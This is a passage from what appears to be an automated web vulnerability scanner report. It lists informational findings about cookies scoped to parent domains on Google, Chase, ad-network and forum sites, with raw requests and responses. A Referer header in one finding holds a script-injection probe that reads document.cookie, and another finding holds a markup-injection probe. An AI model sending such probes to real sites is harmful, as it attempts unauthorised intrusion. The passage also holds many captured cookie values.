Cookie: Apache=168362173x0.688+1294536261x899753879; cv=1%3Aq1ZyLi0uyc91zUtWslIySyktr0nPLLDMMi8zrjGwMswuNjMusjK0MlCqBQA%3D; ut=1%3Aq1YqM1KyqlbKTq0szy9KKVayUsotTzQprDHMLja3sKwxrTE0z9dJzsiwSC%2BoysmrMczJSS%2BqqjGsMYAJZuUgCSrpKCUl5uWlFmWCjVKqrQUA; rb="0:712156:20822400:6ch47d7o8wtv:0:742697:20828160:3011330574290390485:0:753292:20858400:CA-00000000456885722:0:762701:20861280:D8DB51BF08484217F5D14AB47F4002AD:0:806205:20861280:21d8e954-2b06-11e0-8e8a-0025900870d2:0"; srh=1%3Aq64FAA%3D%3D; vsd="0@a@4d49757a@www.ehow.com"

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Wed, 02 Feb 2011 23:36:07 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: Apache-Coyote/1.1
Set-Cookie: vsd="0@1@4d49ea68@www.arbornetworks.com"; Version=1; Domain=.adbrite.com; Max-Age=172800; Path=/
Content-Length: 42

GIF89a.............!.......,........@..D.;

10.20. https://adwords.google.com/select/Login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://adwords.google.com
Path:   /select/Login

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /select/Login HTTP/1.1
Host: adwords.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Set-Cookie: I=XFj06C0BAAA=.DV4x/BeVUC+HuSARN3yhGw==.HK13QWBepYsQmRJ9BTF4Jg==; Path=/select; Secure; HttpOnly
Set-Cookie: S=awfe=gKIahosGT1Lx46FFSga1Jw:awfe-efe=gKIahosGT1Lx46FFSga1Jw; Domain=.google.com; Path=/; Secure; HttpOnly
Set-Cookie: S_awfe=TnPM3R8KED9TFsrbQVNHwA; Domain=.google.com; Path=/; Secure; HttpOnly
Cache-control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Location: /um/StartNewLogin
Date: Thu, 03 Feb 2011 00:08:03 GMT
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<HTML>
<HEAD>
<TITLE>Moved Temporarily</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000">
<H1>Moved Temporarily</H1>
The document has moved <A HREF="/um/StartNewLogin">here</A>.
</BODY>
</HTML>

10.21. http://affiliate.invisionpower.com/scripts/track.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://affiliate.invisionpower.com
Path:   /scripts/track.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /scripts/track.php?visitorId=7432e15fddd3a34a2d79b00lmU2qECVV&tracking=F&url=H_www.invisionpower.com%2F%2Fproducts%2Fboard%2Ffeatures%2F&referrer=H_burp%2Fshow%2F38&getParams=%3F95e51--%253E%253Ca%253E1fddadebe75%3D1&anchor=&cookies= HTTP/1.1
Host: affiliate.invisionpower.com
Proxy-Connection: keep-alive
Referer: http://www.invisionpower.com/products/board/features/?95e51--%3E%3Ca%3E1fddadebe75=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=61175156.1296696677.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/38; __utma=61175156.1901611536.1296685558.1296685558.1296696677.2; __utmc=61175156; __utmb=61175156.1.10.1296696677

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:30:40 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9
X-Powered-By: PHP/5.2.9
P3P: CP="NOI NID ADMa DEVa PSAa OUR BUS ONL UNI COM STA OTC"
Set-Cookie: PAPVisitorId=7432e15fddd3a34a2d79b00lmU2qECVV; expires=Sun, 31-Jan-2021 01:30:40 GMT; path=/; domain=.invisionpower.com
Content-Length: 0
Content-Type: application/x-javascript


10.22. http://api.viglink.com/api/ping  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.viglink.com
Path:   /api/ping

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /api/ping?format=jsonp&key=4f085ab2452b05f4c24c6b37dbc58a3b&loc=http%3A%2F%2Fcommunity.invisionpower.com%2F&subId=d59e71895dde9e0dbe7525217bd974&v=1&jsonp=vglnk_jsonp_12966855687740 HTTP/1.1
Host: api.viglink.com
Proxy-Connection: keep-alive
Referer: http://community.invisionpower.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Content-Language: en-US
Content-Type: text/javascript;charset=ISO-8859-1
Date: Wed, 02 Feb 2011 22:25:07 GMT
Expires: Sat, 06 May 1995 12:00:00 GMT
Pragma: no-cache
Set-Cookie: vglnk.Agent.p=412aef8ac4db8eca6d18ab69d3a4b53c; Domain=.viglink.com; Expires=Sat, 30-Jan-2021 22:25:07 GMT; Path=/
Content-Length: 101
Connection: keep-alive


vl_ping(1296685507564,2000,[],[],{"plugins":{},"timeClick":true,"debug":false,"timePing":false},[]);

10.23. http://blogsearch.google.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogsearch.google.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: blogsearch.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:08:17 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=a1826614eefe1f7c:TM=1296691697:LM=1296691697:S=Fm_U8o3fOwGHFaA9; expires=Sat, 02-Feb-2013 00:08:17 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: bsfe
X-XSS-Protection: 1; mode=block
Connection: close

<html><head><meta HTTP-EQUIV="content-type" content="text/html; charset=UTF-8"><meta description="Google Blog Search provides fresh, relevant search results from millions of feed-enabled blogs. Users
...[SNIP]...

10.24. http://books.google.com/bkshp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://books.google.com
Path:   /bkshp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bkshp HTTP/1.1
Host: books.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:08:19 GMT
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=109a9aeaece08aed:TM=1296691699:LM=1296691699:S=sEECQby9jva9KsA1; expires=Sat, 02-Feb-2013 00:08:19 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: OFE/0.1
Connection: close

<!DOCTYPE html><html><head><script>(function(){function a(d){this.t={};this.tick=function(e,f,b){b=b?b:(new Date).getTime();this.t[e]=[b,f]};this.tick("start",null,d)}var c=new a;window.jstiming={Time
...[SNIP]...

10.25. http://books.google.com/books  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://books.google.com
Path:   /books

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /books HTTP/1.1
Host: books.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:08:18 GMT
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=75899bb590a713b6:TM=1296691698:LM=1296691698:S=LGIgDlcm48-CMNO0; expires=Sat, 02-Feb-2013 00:08:18 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: OFE/0.1
Connection: close

<!DOCTYPE html><html><head><script>(function(){function a(d){this.t={};this.tick=function(e,f,b){b=b?b:(new Date).getTime();this.t[e]=[b,f]};this.tick("start",null,d)}var c=new a;window.jstiming={Time
...[SNIP]...

10.26. http://bs.serving-sys.com/BurstingPipe/adServer.bs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2171139&PluID=0&w=728&h=90&ord=[timestamp]&ucm=true HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://thehill.com/blogs/e2-wire/677-e2-wire650aa'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2295b33377e/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u3=1; C4=; A3=f+JvabEk02WG00002h5iUabNz07l00000Qh5j3abNz07l00000.gn3Ka4JO09MY00001gNfHaaiN0aVX00001fU+La50V0a+r00001fUFGa50V02WG00001gy3.ach00c9M00001cRreabeg03Dk00001gy7La9bU0c9M00003gy5Da9bU0c9M00001gCTVa9bU0c9M00001gvKEacgY0c9M00001ge4Gack+0bM000001ge4Hack+0bM000001; B3=7lgH0000000001sG89PS000000000QsZ89PT000000000.sZ852G0000000003sS7dNH0000000002sZ7GHq0000000001s.7FCH0000000001s.83xP0000000001sF8cVQ0000000001sV852N0000000001s.87ma0000000001s.6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; eyeblaster=BWVal=408&BWDate=40573.510532&debuglevel=&FLV=10.1103&RES=128&WMPV=0; ActivityInfo=000p81bBo%5f; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=BWVal=408&BWDate=40573.510532&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Tue, 03-May-2011 20:25:38 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A3=h5j3abNz07l00000.h5iUabNz07l00000Qf+JvabEk02WG00002gNfHaaiN0aVX00001gn3Ka4JO09MY00001fU+La50V0a+r00001gYx+adw90cvM00001fUFGa50V02WG00001gy3.ach00c9M00001cRreabeg03Dk00001gy7La9bU0c9M00003gCTVa9bU0c9M00001gy5Da9bU0c9M00001gvKEacgY0c9M00001ge4Gack+0bM000001ge4Hack+0bM000001; expires=Tue, 03-May-2011 20:25:38 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=89PS000000000QsZ7lgH0000000001sG89PT000000000.sZ852G0000000003sS7dNH0000000002sZ7GHq0000000001s.7FCH0000000001s.8cVQ0000000001sV83xP0000000001sF852N0000000001s.6o.Q0000000001sY87ma0000000001s.8i430000000001t27gi30000000001sG852z0000000001sS852A0000000001sS; expires=Tue, 03-May-2011 20:25:38 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Tue, 03-May-2011 20:25:38 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Thu, 03 Feb 2011 01:25:38 GMT
Connection: close
Content-Length: 1696

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

10.27. https://chaseonline.chase.com/auth/login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://chaseonline.chase.com
Path:   /auth/login.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /auth/login.aspx HTTP/1.1
Host: chaseonline.chase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 4559
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache=Set-Cookie
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: v1st=8A02CA39CD9313C4; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com
Date: Wed, 02 Feb 2011 22:02:00 GMT
Connection: close


<html>
   <head>
       <title>Login Frame</title>
       <script language="javascript">var jsVer = "";</script>
       <script language="javascript1.1" type="text/javascript">jsVer = "1.1";</script>
       <scrip
...[SNIP]...

10.28. https://chaseonline.chase.com/chaseonline/reidentify/sso_reidentify.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://chaseonline.chase.com
Path:   /chaseonline/reidentify/sso_reidentify.jsp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /chaseonline/reidentify/sso_reidentify.jsp HTTP/1.1
Host: chaseonline.chase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 167
Content-Type: text/html; charset=utf-8
Expires: -1
Location: /Public/Reidentify/ReidentifyFilterView.aspx
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache=Set-Cookie
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: v1st=CA1D7D273B8AF772; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com
Date: Wed, 02 Feb 2011 22:01:53 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fPublic%2fReidentify%2fReidentifyFilterView.aspx">here</a>.</h2>
</body></html>

10.29. https://chaseonline.chase.com/js/Reporting.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://chaseonline.chase.com
Path:   /js/Reporting.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/Reporting.js HTTP/1.1
Host: chaseonline.chase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Length: 70473
Content-Type: application/x-javascript
Content-Location: https://chaseonline.chase.com/js/Reporting.js
Last-Modified: Mon, 06 Dec 2010 18:24:12 GMT
Accept-Ranges: bytes
ETag: "02ebcc77295cb1:51e6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: no-cache=Set-Cookie
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: v1st=6C9A73F2B86FE9ED; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com
Date: Wed, 02 Feb 2011 22:01:52 GMT
Connection: close


var CHASE=CHASE||{};CHASE.analytics=(function(){var analyticsConfig=new(function Config(){this.Enabled=true;this.PageDotPathSet=false;this.Initialized=false;this.DelayTag=false;this.DebugMode=true;th
...[SNIP]...

10.30. http://code.google.com/p/swfobject/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://code.google.com
Path:   /p/swfobject/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p/swfobject/ HTTP/1.1
Host: code.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:09:55 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Set-Cookie: PREF=ID=cf365c01c96c83f0:TM=1296684601:LM=1296684601:S=fZz2qgvUxhAStUQx; expires=Fri, 01-Feb-2013 22:10:01 GMT; path=/; domain=.google.com
Server: codesite
X-XSS-Protection: 1; mode=block
Connection: close


<!DOCTYPE html>
<html>
<head>
<link rel="icon" type="image/vnd.microsoft.icon" href="http://www.gstatic.com/codesite/ph/images/phosting.ico">

<script type="text/javascript">


var codesite_
...[SNIP]...

10.31. http://groups.google.com/groups  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://groups.google.com
Path:   /groups

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /groups?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=wg HTTP/1.1
Host: groups.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:02:49 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=631694ff1b7a6154:TM=1296694969:LM=1296694970:S=4NhZ0w32Gl9oo3YP; expires=Sat, 02-Feb-2013 01:02:50 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: DiscussionFE
X-XSS-Protection: 1; mode=block
Connection: close

<html><head><meta http-equiv=content-type content="text/html; charset=UTF-8"><title>Google Groups</title><link href="/groups/search_static/u7kY4_DCZv8/dfe.css" rel="stylesheet" type="text/css"><style>
...[SNIP]...

10.32. http://groups.google.com/grphp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://groups.google.com
Path:   /grphp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /grphp HTTP/1.1
Host: groups.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=8d6590cd6d6bae50:TM=1296694971:LM=1296694971:S=-Xvd35p4ZHDH2YL5; expires=Sat, 02-Feb-2013 01:02:51 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Thu, 03 Feb 2011 01:02:51 GMT
Server: GWS-GRFE/0.50
X-XSS-Protection: 1; mode=block
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html >
<head>
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

10.33. http://id.google.com/verify/EAAAAG9kfZvLTzdTC1gh7mvNeo8.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAAG9kfZvLTzdTC1gh7mvNeo8.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAG9kfZvLTzdTC1gh7mvNeo8.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ipboard+software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=43=w_Qdc_R1bbRlDs-dYzZ1XxBBP7Rr8d8PCxLqZ6cCRg=FM5tsiHXMmG0LJWl; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=43=QvwfTsBLG0fY_tCzmQcl5S01_3iEzOWMtfTt7pnwqvW9z0YwdoapJxj1G3iMc9VVflP4ZgfthP6beVczqAQ07TzamFD1mLXnRq6Jo4UMiZbB1HugDq4PXprcSp8yxFS7

Response

HTTP/1.1 200 OK
Set-Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; expires=Thu, 04-Aug-2011 22:24:47 GMT; path=/; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Wed, 02 Feb 2011 22:24:47 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

10.34. http://image2.pubmatic.com/AdServer/Pug  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image2.pubmatic.com
Path:   /AdServer/Pug

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTgwNiZ0bD01MTg0MDA=&piggybackCookie=uid:D8DB51BF08484217F5D14AB47F4002AD HTTP/1.1
Host: image2.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://www.arbornetworks.com/report
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KADUSERCOOKIE=4AC32DB0-0B6A-48EE-BE74-FD6E7D9BC764; KRTBCOOKIE_80=1336-82d726c3-44ee-407c-85c4-39a0b0fc11ef.30767.16681.&KRTB&1685-82d726c3-44ee-407c-85c4-39a0b0fc11ef.30767.16681.; KRTBCOOKIE_22=488-pcv:1|uid:3011330574290390485; KRTBCOOKIE_153=1923-41yKvrFZ3L_6C466tA2Vu-Rdi-v6AY_r4FlErZjJ; KRTBCOOKIE_148=1699-uid:D8DB51BF08484217F5D14AB47F4002AD; KRTBCOOKIE_133=1873-6ch47d7o8wtv; KRTBCOOKIE_58=1344-CA-00000000456885722; KRTBCOOKIE_16=226-uid:3271971346728586924; KRTBCOOKIE_57=476-uid:4760492999213801733; KTPCACOOKIE=YES; pubfreq_26263=207-2; PUBRETARGET=82_1389464380.78_1389464380.1113_1297450679.806_1325962677.1039_1297450683.445_1302634725.825_1297450726.1834_1297470581.1444_1298250150

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:36:13 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: PUBRETARGET=82_1389464380.78_1389464380.1113_1297450679.806_1325962677.1039_1297450683.445_1302634725.825_1297450726.1834_1297470581.1444_1298250150; domain=pubmatic.com; expires=Sat, 11-Jan-2014 18:19:40 GMT; path=/
Content-Length: 42
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D.;

10.35. http://jpmorganchase.112.2o7.net/b/ss/jpmcglobal,jpmorgan/1/H.21/s3515906694345  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jpmorganchase.112.2o7.net
Path:   /b/ss/jpmcglobal,jpmorgan/1/H.21/s3515906694345

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/jpmcglobal,jpmorgan/1/H.21/s3515906694345 HTTP/1.1
Host: jpmorganchase.112.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kx60gx60w=[CS]v4|26A20C60051617F4-40000183C02A4478|4D4418BF[CE]; s_vi_bohx7Fbcx7Dbjbx7Eyi=[CS]v4|2694879D05010AB6-600001152001C1C9|4D290F39[CE]; s_vi=[CS]v1|26A4ED7A85148B7E-600001624041C7B6[CE]; s_vi_x7Fx7Ex7Cyx7Eux3Dx7Bux7Ex3Dcduyx7E=[CS]v4|26A0E5B58501123C-400001062000534C|4D41CB69[CE]; s_vi_nxxx7Cbx60mfcjxxwx7Fx7Dx60k=[CS]v4|2697CD9905013D57-60000105600F9188|4D2F9B0A[CE]; s_vi_bwvx7Bux60wwqwasx60x3Fbx60x7Dv=[CS]v4|2696ED9D05011A65-6000010260187391|4D2E46F2[CE]; s_vi_dinydefxxelh=[CS]v4|2696E37B85158159-40000175A004C187|4D30BC07[CE];

Response

HTTP/1.1 302 Found
Date: Thu, 03 Feb 2011 01:02:55 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_x60zgimfehkf=[CS]v4|0-0|4D49FEBF[CE]; Expires=Tue, 2 Feb 2016 01:02:55 GMT; Domain=.2o7.net; Path=/
Location: http://jpmorganchase.112.2o7.net/b/ss/jpmcglobal,jpmorgan/1/H.21/s3515906694345?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.3.1
Expires: Wed, 02 Feb 2011 01:02:55 GMT
Last-Modified: Fri, 04 Feb 2011 01:02:55 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www11
Content-Length: 0
Content-Type: text/plain
Connection: close


10.36. http://leadback.advertising.com/adcedge/lb  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://leadback.advertising.com
Path:   /adcedge/lb

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adcedge/lb?site=695501&srvc=1&betr=citizensvisited_cs=1&betq=11980=427813 HTTP/1.1
Host: leadback.advertising.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1791096;type=citi08ft;cat=homechar;ord=1;num=7738084758166.224?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
